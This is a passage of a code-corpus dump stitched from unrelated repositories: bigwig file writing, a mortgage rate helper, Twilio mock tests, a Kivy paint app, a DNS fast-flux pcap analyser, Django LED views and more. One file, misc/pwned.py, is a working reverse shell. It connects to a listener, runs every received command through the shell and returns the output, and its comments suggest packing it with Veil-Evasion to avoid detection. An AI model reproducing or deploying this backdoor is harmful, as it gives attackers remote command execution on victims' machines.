return df
def get_bigwig_header_info(input_fasta):
"""
Get chromosome names and lengths from reference fasta.
:param input_fasta: Name of reference fasta file.
:return header: List of tuples, containing [ (ref1, length1), (ref2, length2), ...] .
"""
logging.debug("get_bigwig_header_info: Getting ref:length info from reference fasta.\n")
header = []
with open(input_fasta) as fh:
for record in SeqIO.parse(fh, "fasta"):
header.append((record.id, len(record.seq)))
return header
def write_bigwig_from_df(df, header, outname):
"""
Function to write a bigwig file using a pandas dataframe from a bed file.
:param df: Pandas dataframe object (created from bed file).
:param header: List containing (ref name, length) information. (list of tuples)
:param outname: Name of bigwig output file to write (OUT.bw).
"""
logging.debug("write_bigwig_from_df: Writing bigwig file for '{}'.\n".format(outname))
# first filter reference contigs to match those in bed file
# get all unique ref contig names from bed
chroms_present = list(df["chromosome"].unique())
# header is a list of tuples, filter to keep only those present in bed
# must also sort reference contigs by name
filtered_header = sorted([x for x in header if x[0] in chroms_present], key=itemgetter(0))
for i,j in filtered_header:
logging.debug("\tHeader includes: '{}', '{}'.".format(i,j))
# raise error if no reference contig names match
if not filtered_header:
logging.error("No reference contig names match between bed file and reference fasta!")
raise ValueError("No reference contig names match between bed file and reference fasta!")
# open bigwig object, enable writing mode (default is read only)
bw = pyBigWig.open(outname, "w")
# must add header to bigwig prior to writing entries
bw.addHeader(filtered_header)
# iterate over ref contig names
for chrom, length in filtered_header:
logging.debug("\tAdding entries for '{}'.".format(chrom))
# subset dataframe by chromosome name
temp_df = df[df["chromosome"] == chrom]
logging.debug("\tNumber of entries = {:,}.".format(temp_df.shape[0]))
# add entries in order specified for bigwig objects:
# list of chr names: ["chr1", "chr1", "chr1"]
# list of start coords: [1, 100, 125]
# list of stop coords: ends=[6, 120, 126]
# list of vals: values=[0.0, 1.0, 200.0]
bw.addEntries(list(temp_df["chromosome"]),
list(temp_df["start"]),
ends=list(temp_df["stop"]),
values=list(temp_df["mod_probability"]))
logging.debug("\tFinished entries for '{}'.\n".format(chrom))
# close bigwig object
bw.close()
def convert_bed_to_bigwig(bed_files, fasta, pileup_mode):
"""
Write bigwig files for each output bed file.
:param bed_files: List of output bed file names. (list)
:param fasta: A path to reference fasta file. (str)
:param pileup_mode: Site modification calling method. (str: "model", "count")
"""
logging.info("convert_bed_to_bigwig: Converting {} bed files to bigwig files.\n".format(len(bed_files)))
header = get_bigwig_header_info(fasta)
for bed in bed_files:
outname = "{}.bw".format(bed.split(".bed")[0])
df = make_bed_df(bed, pileup_mode)
write_bigwig_from_df(df, header, outname)
def main():
args = get_args()
setup_logging(args.output_label)
log_args(args)
if args.pileup_mode == "model":
        if args.model_dir is None:
logging.error("Must supply a model to use when running model-based scoring!")
raise ValueError("Must supply a model to use when running model-based scoring!")
else:
if not os.path.isdir(args.model_dir):
logging.error("{} is not a valid directory path!".format(args.model_dir))
raise ValueError("{} is not a valid directory path!".format(args.model_dir))
print("\nChunking regions for multiprocessing.")
regions_to_process = get_regions_to_process(args.bam, args.fasta, args.chunksize, args.modsites,
args.pileup_mode, args.model_dir, args.min_mapq, args.hap_tag)
print("Running multiprocessing on {:,} chunks.".format(len(regions_to_process)))
bed_results = run_all_pileup_processing(regions_to_process, args.threads)
print("Finished multiprocessing.\nWriting bed files.")
bed_files = write_output_bed(args.output_label, args.modsites, args.min_coverage, bed_results)
print("Writing bigwig files.")
convert_bed_to_bigwig(bed_files, args.fasta, args.pileup_mode)
print("Finished.\n")
if __name__ == '__main__':
main()
| 2.203125 | 2 |
src/mortgage_scenarios/utils.py | mielski/mortgage_scenario | 1 | 12773175 | import numpy as np
def get_monthly_rate(rate) -> float:
"""
computes the monthy interest rate based on the yearly interest rate
:param float rate: the yearly interest rate
:return: the monthly interest rate
This computation uses the 12th root on the growth factor
"""
growth_year = rate + 1
growth_month = np.power(growth_year, 1./12)
rate_month = growth_month - 1
return rate_month
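# Example (illustrative): a 3% yearly rate compounds to roughly 0.2466% per month
#   >>> round(get_monthly_rate(0.03), 6)
#   0.002466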
| 4.4375 | 4 |
tests/test_mock_twilio.py | gregziegan/eviction-tracker | 5 | 12773176 |
import json
from flask_testing import TestCase
from eviction_tracker.detainer_warrants.models import PhoneNumberVerification
from eviction_tracker.database import db
from eviction_tracker.app import create_app
class MockTwilioLookup:
def __init__(self, dictionary):
for k, v in dictionary.items():
setattr(self, k, v)
    @staticmethod
    def from_fixture(file_name):
        # load a recorded Twilio JSON response and wrap it as a mock lookup object
        with open(file_name) as twilio_response:
            phone_dict = json.load(twilio_response)
        return MockTwilioLookup(phone_dict)
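# Example (illustrative, hypothetical values): the mock exposes each top-level
# key of the fixture JSON as an attribute:
#   >>> lookup = MockTwilioLookup({'phone_number': '+15555550100', 'carrier': None})
#   >>> lookup.phone_number
#   '+15555550100'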
class TestTwilioResponse(TestCase):
def create_app(self):
app = create_app(self)
app.config['TESTING'] = True
app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql+psycopg2://eviction_tracker_test:junkdata@localhost:5432/eviction_tracker_test'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
return app
def setUp(self):
db.create_all()
def tearDown(self):
db.session.remove()
db.drop_all()
def test_insert_phone_with_caller_name(self):
'''
Testing json response with caller_name but null carrier
'''
twilio_response = MockTwilioLookup.from_fixture(
'tests/fixtures/phone_number_with_caller_name.json')
phone_number = PhoneNumberVerification.from_twilio_response(
twilio_response)
db.session.add(phone_number)
db.session.commit()
phone_number_entry = db.session.query(PhoneNumberVerification).first()
self.assertEqual(
twilio_response.caller_name['caller_name'], phone_number_entry.caller_name)
self.assertEqual(
twilio_response.caller_name['caller_type'], phone_number_entry.caller_type)
self.assertEqual(
twilio_response.caller_name['error_code'], phone_number_entry.name_error_code)
self.assertEqual(twilio_response.carrier,
phone_number_entry.carrier_error_code)
self.assertEqual(twilio_response.carrier,
phone_number_entry.mobile_country_code)
self.assertEqual(twilio_response.carrier,
phone_number_entry.mobile_network_code)
self.assertEqual(twilio_response.carrier,
phone_number_entry.carrier_name)
self.assertEqual(twilio_response.carrier,
phone_number_entry.phone_type)
self.assertEqual(twilio_response.country_code,
phone_number_entry.country_code)
self.assertEqual(twilio_response.national_format,
phone_number_entry.national_format)
self.assertEqual(twilio_response.phone_number,
phone_number_entry.phone_number)
def test_insert_phone_missing_caller_name(self):
'''
Testing json response with carrier but null caller_name
'''
twilio_response = MockTwilioLookup.from_fixture(
'tests/fixtures/phone_number_missing_caller_name.json')
        output_missing_name = PhoneNumberVerification.from_twilio_response(
            twilio_response)
db.session.add(output_missing_name)
db.session.commit()
phone_number_entry = db.session.query(PhoneNumberVerification).first()
self.assertEqual(twilio_response.caller_name,
phone_number_entry.caller_name)
self.assertEqual(twilio_response.caller_name,
phone_number_entry.caller_type)
self.assertEqual(twilio_response.caller_name,
phone_number_entry.name_error_code)
self.assertEqual(
twilio_response.carrier['error_code'], phone_number_entry.carrier_error_code)
self.assertEqual(
twilio_response.carrier['mobile_country_code'], phone_number_entry.mobile_country_code)
self.assertEqual(
twilio_response.carrier['mobile_network_code'], phone_number_entry.mobile_network_code)
self.assertEqual(twilio_response.carrier['name'],
phone_number_entry.carrier_name)
self.assertEqual(twilio_response.carrier['type'],
phone_number_entry.phone_type)
self.assertEqual(twilio_response.country_code,
phone_number_entry.country_code)
self.assertEqual(twilio_response.national_format,
phone_number_entry.national_format)
self.assertEqual(twilio_response.phone_number,
phone_number_entry.phone_number)
def test_insert_phone_with_all_data(self):
'''
        Testing json response with both caller_name and carrier data
'''
twilio_response = MockTwilioLookup.from_fixture(
'tests/fixtures/phone_number_with_all_data.json')
phone_number = PhoneNumberVerification.from_twilio_response(
twilio_response)
db.session.add(phone_number)
db.session.commit()
phone_number_entry = db.session.query(PhoneNumberVerification).first()
self.assertEqual(
twilio_response.caller_name['caller_name'], phone_number_entry.caller_name)
self.assertEqual(
twilio_response.caller_name['caller_type'], phone_number_entry.caller_type)
self.assertEqual(
twilio_response.caller_name['error_code'], phone_number_entry.name_error_code)
self.assertEqual(
twilio_response.carrier['error_code'], phone_number_entry.carrier_error_code)
self.assertEqual(
twilio_response.carrier['mobile_country_code'], phone_number_entry.mobile_country_code)
self.assertEqual(
twilio_response.carrier['mobile_network_code'], phone_number_entry.mobile_network_code)
self.assertEqual(twilio_response.carrier['name'],
phone_number_entry.carrier_name)
self.assertEqual(twilio_response.carrier['type'],
phone_number_entry.phone_type)
self.assertEqual(twilio_response.country_code,
phone_number_entry.country_code)
self.assertEqual(twilio_response.national_format,
phone_number_entry.national_format)
self.assertEqual(twilio_response.phone_number,
phone_number_entry.phone_number)
| 2.515625 | 3 |
misc/pwned.py | benhunter/py-stuff | 3 | 12773177 | # Open a reverse shell when executed on a victim computer.
import socket
import subprocess
HOST = "127.0.0.1"
PORT = 31337
sockobj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sockobj.connect((HOST, PORT))
while True:
    data = sockobj.recv(4096)  # returns a bytes object
    if not data:  # an empty read means the remote side closed the connection
        break
# don't forget to decode the bytes to str
proc = subprocess.Popen(data.decode(), shell=True, stdout=subprocess.PIPE, stdin=subprocess.PIPE,
stderr=subprocess.PIPE)
result = proc.stdout.read() + proc.stderr.read()
sockobj.send(result)
sockobj.close()  # reachable now that the loop breaks on disconnect
# Veil-Evasion make .py to .exe
# auxilary/pyinstaller-wrapper
# connect to nc (Windows)
# nc -L -p 31337 -v
| 2.65625 | 3 |
model/model.py | ddl-aambekar/model | 0 | 12773178 |
# This is a sample Python model
# Import dependencies
import random
# Define a helper function to generate a random number:
def random_number(start, stop):
return random.uniform(start, stop)
# Define a function to create an API
# To call, use {"data": {"start": 1, "stop": 100}}
# Learn more at http://support.dominodatalab.com/hc/en-us/articles/204173149
def my_model(start, stop):
return dict(a_random_number=random_number(start, stop))
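# Example (illustrative):
#   >>> result = my_model(1, 100)
#   >>> 1 <= result['a_random_number'] <= 100
#   True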
| 3.0625 | 3 |
paint app/main.py | KhamisiKibet/Kivy | 0 | 12773179 | ########################################################################
## SPINN DESIGN CODE
# YOUTUBE: (SPINN TV) https://www.youtube.com/spinnTv
# WEBSITE: spinndesign.com
# TUTORIAL: KIVY
########################################################################
########################################################################
## IMPORTS
########################################################################
from random import random
# Import kivy app
from kivy.app import App
# Import kivy widget
from kivy.uix.widget import Widget
# Import kivy button
from kivy.uix.button import Button
# Import graphics
from kivy.graphics import Color, Ellipse, Line
########################################################################
## PAINT WIDGET CLASS
########################################################################
class MyPaintWidget(Widget):
# Touch event listener
def on_touch_down(self, touch):
# Create random color
color = (random(), 1, 1)
# Draw
with self.canvas:
Color(*color, mode='hsv')
# Ellipse size
d = 30.
# draw Ellipse
Ellipse(pos=(touch.x - d / 2, touch.y - d / 2), size=(d, d))
# Create touch points/ draw line
touch.ud['line'] = Line(points=(touch.x, touch.y))
def on_touch_move(self, touch):
# Add touch points to draw a line
touch.ud['line'].points += [touch.x, touch.y]
########################################################################
## MAIN CLASS
########################################################################
class MyPaintApp(App):
# Build app UI
def build(self):
# Parent widget
parent = Widget()
# Painter Widget
self.painter = MyPaintWidget()
# Clear button
clearbtn = Button(text='Clear')
# Bind button event
clearbtn.bind(on_release=self.clear_canvas)
# Add widgets to parent
parent.add_widget(self.painter)
parent.add_widget(clearbtn)
# Return parent
return parent
# A function to clear the canvas
def clear_canvas(self, obj):
self.painter.canvas.clear()
########################################################################
## RUN THE APP
########################################################################
if __name__ == '__main__':
MyPaintApp().run()
########################################################################
## <== END ==>
########################################################################
| 2.453125 | 2 |
parseridge/parser/training/hyperparameters.py | jgontrum/parseridge | 6 | 12773180 | from copy import deepcopy
from dataclasses import dataclass
from parseridge.utils.logger import LoggerMixin
"""
TODO
[ ] Group the parameters
[ ] Add save to / load from YAML
[x] Add overwrite method from kwargs
"""
@dataclass
class Hyperparameters(LoggerMixin):
"""
Container for the various hyper-parameters used in the training process.
They are stored here to keep the code in the trainer clean.
"""
learning_rate: float = 1e-3
batch_size: int = 4
error_probability: float = 0.1
oov_probability: float = 0.25
margin_threshold: float = 2.5
token_dropout: float = 0.01
loss_function: str = "CrossEntropy" # See Criterion.LOSS_FUNCTIONS
def update(self, **kwargs):
new_object = deepcopy(self)
for parameter_name, value in kwargs.items():
if not parameter_name.startswith("_") and hasattr(new_object, parameter_name):
setattr(new_object, parameter_name, value)
else:
self.logger.warning(f"Cannot update value for '{parameter_name}'.")
return new_object
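# Example (illustrative): update() returns a modified copy, leaving the original
# untouched and warning on unknown parameter names:
#   >>> base = Hyperparameters()
#   >>> tuned = base.update(learning_rate=5e-4, batch_size=16)
#   >>> base.learning_rate, tuned.learning_rate
#   (0.001, 0.0005)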
| 2.65625 | 3 |
Python-Chaptering/Chapter-4/7-testFastFlux.py | JARVIS-AI/python-codes | 8 | 12773181 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
from scapy.all import *
dnsRecords = {}
def handlePkt(pkt):
if pkt.haslayer(DNSRR):
rrname = pkt.getlayer(DNSRR).rrname
rdata = pkt.getlayer(DNSRR).rdata
        # record each unique answer IP observed for this record name
        if rdata not in dnsRecords.setdefault(rrname, []):
            dnsRecords[rrname].append(rdata)
def main():
pkts = rdpcap('fastFlux.pcap')
for pkt in pkts:
handlePkt(pkt)
for item in dnsRecords:
        print('[+] ' + item + ' has ' + str(len(dnsRecords[item]))
              + ' unique IPs.')
if __name__ == '__main__':
main()
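# Example output (illustrative; exact formatting depends on the scapy version):
#   [+] badguy.example.com. has 12 unique IPs.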
| 2.6875 | 3 |
test_profanity_check.py | rnegron/django-profanity-check | 0 | 12773182 | import pytest
from profanity.templatetags.profanity import censor
@pytest.mark.parametrize("word", ["fuck", "shit", "cunt", "ass"])
def test_censors_profane_words(word):
assert censor(word) == ("*" * len(word))
@pytest.mark.parametrize("word", ["fudge", "poop", "baddie", "butt"])
def test_does_not_censor_other_words(word):
assert censor(word) == word
@pytest.mark.parametrize(
"sentence",
[
"Fuck you!",
"You are a piece of shit",
"Wow, what a cunt.",
"Thanks for being an asshole",
],
)
def test_censors_words_in_sentences(sentence):
assert "*" in censor(sentence)
@pytest.mark.parametrize(
"sentence",
[
"Screw you!",
"You are a bad person",
"Wow, what a doodoo head",
"Thanks for being a meanie",
],
)
def test_does_not_censor_other_words_in_sentences(sentence):
assert sentence == censor(sentence)
| 2.75 | 3 |
leds/views.py | alyoshenka/DjangoSite | 0 | 12773183 | from django.shortcuts import get_object_or_404, render
from django.urls import reverse
from django.http import HttpResponse, HttpResponseRedirect
import json
from .models import Color, Board, LED
def index(request):
"""Homepage"""
all_colors = Color.objects.all() # change to selected colors
all_boards = Board.objects.all() # change to selected boards
    current_color_label = request.session.get('current_color')
    try:
        current_board_label = request.session['current_board']
        current_board = Board.objects.get(label=current_board_label)
        current_arr = current_board.display_arr()
    except (KeyError, Board.DoesNotExist):
        # no board selected yet, or the selected board no longer exists
        current_board = None
        current_arr = None
context = {
'current_arr': current_arr,
'colors': all_colors,
'boards': all_boards,
'current_color': current_color_label,
'current_board': current_board
}
return render(request, 'leds/index.html', context)
def color(request, color_name):
"""Displays information for a given color"""
color = get_object_or_404(Color, label=color_name)
context = {
'color': color
}
return render(request, 'leds/color.html', context)
def board(request, board_label):
"""Displays information for a given board"""
board = get_object_or_404(Board, label=board_label)
arr = board.display_arr()
context = { 'board': board, 'arr': arr }
return render(request, 'leds/board.html', context)
def all_colors(request):
"""Show all the colors"""
all_colors = Color.objects.all()
context = {
'all_colors': all_colors
}
return render(request, 'leds/all_colors.html', context)
def all_boards(request):
"""Show all boards"""
all_boards = Board.objects.all()
context = { 'all_boards': all_boards }
return render(request, 'leds/all_boards.html', context)
def set_led_color(request, board_label, led_idx, color_label):
board = Board.objects.get(label=board_label)
    led = LED.objects.get(index=led_idx, board=board)  # match LED by position on this board
color = Color.objects.get(label=color_label)
led.color = color
led.save()
return HttpResponseRedirect(reverse('leds:boards', args=(board_label,)))
# session testing
def selected_color(request):
"""Get selected color from session"""
_label = request.session['current_color']
color = None if _label == 'none' else Color.objects.get(label=_label)
return color
def LED_click(request, led_index):
"""An LED in a board is clicked
set LED color"""
# get selected color
# find associated color by label
color = selected_color(request)
# get currently displayed board in session
    try:
        board_label = request.session['current_board']
        board = Board.objects.get(label=board_label)
    except (KeyError, Board.DoesNotExist):
        board = None
if color is not None and board is not None:
# find LED associated to button (by idx)
# and board
led = LED.objects.get(index=led_index, board=board)
# set LED color to color
led.color = color
# save
led.save()
print('set ', led_index, ' to ', color)
# return to original page
return HttpResponseRedirect(reverse('leds:index'))
def color_click(request, color_label):
"""A displayed color is clicked
select color"""
color = Color.objects.get(label=color_label)
obj = json.loads(color.json())[0]
label = obj.get('fields').get('label')
    if 'current_color' not in request.session:
request.session['current_color'] = 'none'
elif request.session['current_color'] == label:
request.session['current_color'] = 'none'
else:
request.session['current_color'] = label
# return HttpResponse(request.session['current_color'])
return HttpResponseRedirect(reverse('leds:index'))
def board_click(request, board_label):
"""A displayed board is clicked
select board"""
board = Board.objects.get(label=board_label)
obj = json.loads(board.json())[0]
label = obj.get('fields').get('label')
    if 'current_board' not in request.session:
request.session['current_board'] = 'none'
elif request.session['current_board'] == label:
request.session['current_board'] = 'none'
else:
request.session['current_board'] = label
#return HttpResponse(request.session['current_board'])
return HttpResponseRedirect(reverse('leds:index'))
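# Note: color_click and board_click share the same toggle pattern; a generic
# helper (illustrative refactoring sketch, not part of the original views)
# could collapse both:
#     def _toggle_session(session, key, label):
#         session[key] = 'none' if session.get(key) == label else label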
| 2.359375 | 2 |
cmd/lambda/users/main.py | forstmeier/numermatic | 0 | 12773184 | <filename>cmd/lambda/users/main.py
import json
import os
import time
import uuid
import boto3
def handler(event, context):
print('event:', event)
user_id = str(uuid.uuid4().hex)
body = json.loads(event['body'])
dynamodb = boto3.client('dynamodb')
try:
put_item_response = dynamodb.put_item(
TableName=os.getenv('USERS_TABLE_NAME'),
Item={
'id': {
'S': user_id,
},
'email': {
'S': body['email'],
},
'timestamp': {
'N': str(time.time()),
}
}
)
return {
'body': json.dumps({
'message': 'successfully created user',
'user_id': user_id,
}),
'statusCode': 200,
'isBase64Encoded': False,
}
except Exception as e:
print('exception:', e)
return {
'body': str(e),
'statusCode': 500,
'isBase64Encoded': False,
}
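# Expected request/response shapes (illustrative, inferred from the handler):
#   event["body"]  -> '{"email": "user@example.com"}'
#   on success     -> {"statusCode": 200,
#                      "body": '{"message": ..., "user_id": "<32-char hex>"}'}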
| 2.203125 | 2 |
src/config.py | Biano-AI/serving-compare-middleware | 6 | 12773185 | <filename>src/config.py<gh_stars>1-10
# -*- encoding: utf-8 -*-
# ! python3
from __future__ import annotations
from pydantic import AnyUrl, BaseSettings
class Settings(BaseSettings):
tfserving_service_url: AnyUrl
torchserve_service_url: AnyUrl
triton_service_host: str
tfserving_grpc_host: str = "localhost:9000"
torchserve_grpc_host: str = "localhost:7070"
triton_grpc_host: str = "localhost:XXXX"
class Config:
env_file = ".env"
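# Illustrative .env contents (assumed values, not from the original repo):
#   TFSERVING_SERVICE_URL=http://localhost:8501
#   TORCHSERVE_SERVICE_URL=http://localhost:8080
#   TRITON_SERVICE_HOST=localhost
# settings = Settings()  # pydantic fills the fields from .env / the environment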
| 1.6875 | 2 |
Professor/apps.py | AlirezAkbary/FeedbackSys | 0 | 12773186 | from django.apps import AppConfig
class ProfessorConfig(AppConfig):
name = 'Professor'
| 1.351563 | 1 |
octopus/config/cli.py | tuub/magnificent-octopus | 0 | 12773187 | <filename>octopus/config/cli.py<gh_stars>0
# command names and paths to scripts that can be run through the standard runner
CLI_SCRIPTS = {
"usermod" : "octopus.modules.account.scripts.UserMod"
} | 1.375 | 1 |
paper_notebooks/temp_ktica.py | andrewlferguson/hde | 5 | 12773188 | import numpy as np
import pyemma as py
# from msmbuilder.decomposition.tica import tICA
from sklearn.kernel_approximation import Nystroem
class Kernel_tica(object):
def __init__(self, n_components, lag_time,
gamma, # gamma value for rbf kernel
n_components_nystroem=100, # number of components for Nystroem kernel approximation
landmarks = None,
shrinkage = None,
weights='empirical' # if 'koopman', use Koopman reweighting for tICA (see Wu, Hao, et al. "Variational Koopman models: slow collective variables and molecular kinetics from short off-equilibrium simulations." The Journal of Chemical Physics 146.15 (2017): 154104.)
):
self._n_components = n_components
self._lag_time = lag_time
self._n_components_nystroem = n_components_nystroem
self._landmarks = landmarks
self._gamma = gamma
self._nystroem = Nystroem(gamma=gamma, n_components=n_components_nystroem)
self._weights = weights
# self._tica = tICA(n_components=n_components, lag_time=lag_time, shrinkage=shrinkage)
self._shrinkage = shrinkage
return
def fit(self, sequence_list):
if self._landmarks is None:
self._nystroem.fit(np.concatenate(sequence_list))
else:
print("using landmarks")
self._nystroem.fit(self._landmarks)
sequence_transformed = [self._nystroem.transform(item) for item in sequence_list]
# define tica object at fit() with sequence_list supplied for initialization, as it is required by
# Koopman reweighting
self._tica = py.coordinates.tica(sequence_transformed, lag=self._lag_time,
dim=self._n_components, kinetic_map=True,
weights=self._weights)
return
def transform(self, sequence_list):
return self._tica.transform(
[self._nystroem.transform(item) for item in sequence_list])
def fit_transform(self, sequence_list):
self.fit(sequence_list)
return self.transform(sequence_list)
def score(self, sequence_list):
model = self.__class__(n_components = self._n_components, lag_time=self._lag_time, gamma=self._gamma,
n_components_nystroem=self._n_components_nystroem, landmarks=self._landmarks,
shrinkage=self._shrinkage)
model.fit(sequence_list)
return np.sum(model._tica.eigenvalues)
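# Illustrative usage sketch (assumed data shapes, not from the original
# notebook): approximate an RBF kernel with Nystroem features, then run
# time-lagged ICA on the transformed trajectories.
if __name__ == '__main__':
    trajs = [np.random.rand(500, 10) for _ in range(3)]
    ktica = Kernel_tica(n_components=2, lag_time=10, gamma=0.05)
    projections = ktica.fit_transform(trajs)  # three (500, 2) arrays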
| 2.421875 | 2 |
tests/test_transition.py | takuseno/kiox | 2 | 12773189 | <reponame>takuseno/kiox
from collections import deque
import numpy as np
from kiox.episode import EpisodeManager
from kiox.step import StepBuffer
from kiox.transition import FrameStackLazyTransition, SimpleLazyTransition
from kiox.transition_buffer import UnlimitedTransitionBuffer
from .utility import StepFactory
def test_simple_lazy_transition():
factory = StepFactory()
step_buffer = StepBuffer()
episode_manager = EpisodeManager(step_buffer, UnlimitedTransitionBuffer())
step1 = episode_manager.append_step(factory())
step2 = episode_manager.append_step(factory(terminal=True))
# test transition
lazy_transition1 = SimpleLazyTransition(
curr_idx=step1.idx,
next_idx=step2.idx,
multi_step_reward=1.0,
duration=1,
)
transition = lazy_transition1.create(step_buffer)
assert np.all(transition.observation == step1.observation)
assert np.all(transition.next_observation == step2.observation)
assert transition.reward == 1.0
assert transition.terminal == 0.0
assert transition.duration == 1
# test terminal transition
lazy_transition2 = SimpleLazyTransition(
curr_idx=step2.idx,
next_idx=None,
multi_step_reward=1.0,
duration=1,
)
transition = lazy_transition2.create(step_buffer)
assert np.all(transition.observation == step2.observation)
assert np.all(transition.next_observation == 0.0)
assert transition.reward == 1.0
assert transition.terminal == 1.0
assert transition.duration == 1
def test_frame_stack_lazy_transition():
factory = StepFactory(observation_shape=(1, 84, 84))
step_buffer = StepBuffer()
episode_manager = EpisodeManager(step_buffer, UnlimitedTransitionBuffer())
steps = []
prev_idx = deque(maxlen=4)
frames = deque(maxlen=4)
for _ in range(4):
frames.append(np.zeros((1, 84, 84)))
for i in range(9):
step = episode_manager.append_step(factory())
steps.append(step)
prev_idx.append(step.idx)
frames.append(step.observation)
if i > 0:
lazy_transition = FrameStackLazyTransition(
curr_idx=steps[i - 1].idx,
next_idx=steps[i].idx,
multi_step_reward=1.0,
duration=1,
n_frames=3,
prev_frames=list(prev_idx)[:-2],
)
transition = lazy_transition.create(step_buffer)
ref_observation = np.vstack(list(frames)[:-1])
ref_next_observation = np.vstack(list(frames)[1:])
assert transition.observation.shape == (3, 84, 84)
assert transition.next_observation.shape == (3, 84, 84)
assert np.all(transition.observation == ref_observation)
assert np.all(transition.next_observation == ref_next_observation)
assert transition.reward == 1.0
assert transition.terminal == 0.0
assert transition.duration == 1
step = episode_manager.append_step(factory(terminal=True))
steps.append(step)
prev_idx.append(step.idx)
frames.append(step.observation)
# test terminal transition
lazy_transition = FrameStackLazyTransition(
curr_idx=steps[-1].idx,
next_idx=None,
multi_step_reward=1.0,
duration=1,
n_frames=3,
prev_frames=list(prev_idx)[1:-1],
)
transition = lazy_transition.create(step_buffer)
ref_observation = np.vstack(list(frames)[1:])
ref_next_observation = np.zeros((3, 84, 84))
assert np.all(transition.observation == ref_observation)
assert np.all(transition.next_observation == ref_next_observation)
assert transition.reward == 1.0
assert transition.terminal == 1.0
assert transition.duration == 1
| 2.0625 | 2 |
test/unit/builders/test_custom.py | jimporter/mopack | 0 | 12773190 | import os
import subprocess
from unittest import mock
from . import BuilderTest, MockPackage, through_json
from .. import mock_open_log
from mopack.builders import Builder
from mopack.builders.custom import CustomBuilder
from mopack.iterutils import iterate
from mopack.path import Path
from mopack.shell import ShellArguments
from mopack.usage.pkg_config import PkgConfigUsage
class TestCustomBuilder(BuilderTest):
builder_type = CustomBuilder
def check_build(self, builder, build_commands=None, *, submodules=None,
usage=None):
if usage is None:
pcfiles = ['foo']
pcfiles.extend('foo_{}'.format(i) for i in iterate(submodules))
usage = {'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo')], 'pcfiles': pcfiles,
'extra_args': []}
if build_commands is None:
builddir = os.path.join(self.pkgdir, 'build', builder.name)
build_commands = [i.fill(srcdir=self.srcdir, builddir=builddir)
for i in builder.build_commands]
with mock_open_log() as mopen, \
mock.patch('mopack.builders.custom.pushd'), \
mock.patch('subprocess.run') as mcall: # noqa
builder.build(self.pkgdir, self.srcdir)
mopen.assert_called_with(os.path.join(
self.pkgdir, 'logs', 'foo.log'
), 'a')
for line in build_commands:
mcall.assert_any_call(line, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True, check=True)
self.assertEqual(builder.get_usage(
MockPackage(), submodules, self.pkgdir, self.srcdir
), usage)
def test_basic(self):
builder = self.make_builder('foo', build_commands=[
'configure', 'make'
], usage='pkg_config')
self.assertEqual(builder.name, 'foo')
self.assertEqual(builder.build_commands, [
ShellArguments(['configure']),
ShellArguments(['make']),
])
self.assertEqual(builder.deploy_commands, [])
self.assertEqual(builder.usage, PkgConfigUsage(
'foo', submodules=None, _options=self.make_options(),
_path_bases=self.path_bases
))
self.check_build(builder)
def test_build_list(self):
builder = self.make_builder('foo', build_commands=[
['configure', '--foo'], ['make', '-j2']
], usage='pkg_config')
self.assertEqual(builder.name, 'foo')
self.assertEqual(builder.build_commands, [
ShellArguments(['configure', '--foo']),
ShellArguments(['make', '-j2']),
])
self.assertEqual(builder.deploy_commands, [])
self.assertEqual(builder.usage, PkgConfigUsage(
'foo', submodules=None, _options=self.make_options(),
_path_bases=self.path_bases
))
self.check_build(builder)
def test_path_objects(self):
opts = self.make_options()
builder = self.make_builder('foo', build_commands=[
'configure $srcdir/build',
['make', '-C', '$builddir'],
], usage='pkg_config')
self.assertEqual(builder.name, 'foo')
self.assertEqual(builder.build_commands, [
ShellArguments(['configure', (Path('', 'srcdir'), '/build')]),
ShellArguments(['make', '-C', Path('', 'builddir')]),
])
self.assertEqual(builder.deploy_commands, [])
self.assertEqual(builder.usage, PkgConfigUsage(
'foo', submodules=None, _options=opts, _path_bases=self.path_bases
))
self.check_build(builder, build_commands=[
['configure', self.srcdir + '/build'],
['make', '-C', os.path.join(self.pkgdir, 'build', 'foo')],
])
def test_deploy(self):
builder = self.make_builder('foo', build_commands=['make'],
deploy_commands=['make install'],
usage='pkg_config')
self.assertEqual(builder.name, 'foo')
self.assertEqual(builder.build_commands, [
ShellArguments(['make']),
])
self.assertEqual(builder.deploy_commands, [
ShellArguments(['make', 'install']),
])
self.assertEqual(builder.usage, PkgConfigUsage(
'foo', submodules=None, _options=self.make_options(),
_path_bases=self.path_bases
))
self.check_build(builder)
with mock_open_log() as mopen, \
mock.patch('mopack.builders.custom.pushd'), \
mock.patch('subprocess.run') as mcall: # noqa
builder.deploy(self.pkgdir, self.srcdir)
mopen.assert_called_with(os.path.join(
self.pkgdir, 'logs', 'deploy', 'foo.log'
), 'a')
mcall.assert_called_with(
['make', 'install'], stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, universal_newlines=True,
check=True
)
def test_cd(self):
opts = self.make_options()
builder = self.make_builder('foo', build_commands=[
'configure $srcdir/build',
'cd $builddir',
'make',
], usage='pkg_config')
self.assertEqual(builder.name, 'foo')
self.assertEqual(builder.build_commands, [
ShellArguments(['configure', (Path('', 'srcdir'), '/build')]),
ShellArguments(['cd', Path('', 'builddir')]),
ShellArguments(['make']),
])
self.assertEqual(builder.usage, PkgConfigUsage(
'foo', submodules=None, _options=opts, _path_bases=self.path_bases
))
with mock.patch('os.chdir') as mcd:
builddir = os.path.join(self.pkgdir, 'build', 'foo')
self.check_build(builder, build_commands=[
['configure', self.srcdir + '/build'],
['make'],
])
mcd.assert_called_once_with(builddir)
def test_cd_invalid(self):
builder = self.make_builder('foo', build_commands=[
'cd foo bar',
], usage='pkg_config')
with mock_open_log() as mopen, \
mock.patch('mopack.builders.custom.pushd'), \
self.assertRaises(RuntimeError): # noqa
builder.build(self.pkgdir, self.srcdir)
def test_usage_full(self):
builder = self.make_builder(
'foo', build_commands=['make'],
usage={'type': 'pkg_config', 'path': 'pkgconf'}
)
self.assertEqual(builder.name, 'foo')
self.assertEqual(builder.build_commands, [
ShellArguments(['make']),
])
self.assertEqual(builder.usage, PkgConfigUsage(
'foo', path='pkgconf', submodules=None,
_options=self.make_options(), _path_bases=self.path_bases
))
self.check_build(builder, usage={
'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo', 'pkgconf')], 'pcfiles': ['foo'],
'extra_args': [],
})
def test_submodules(self):
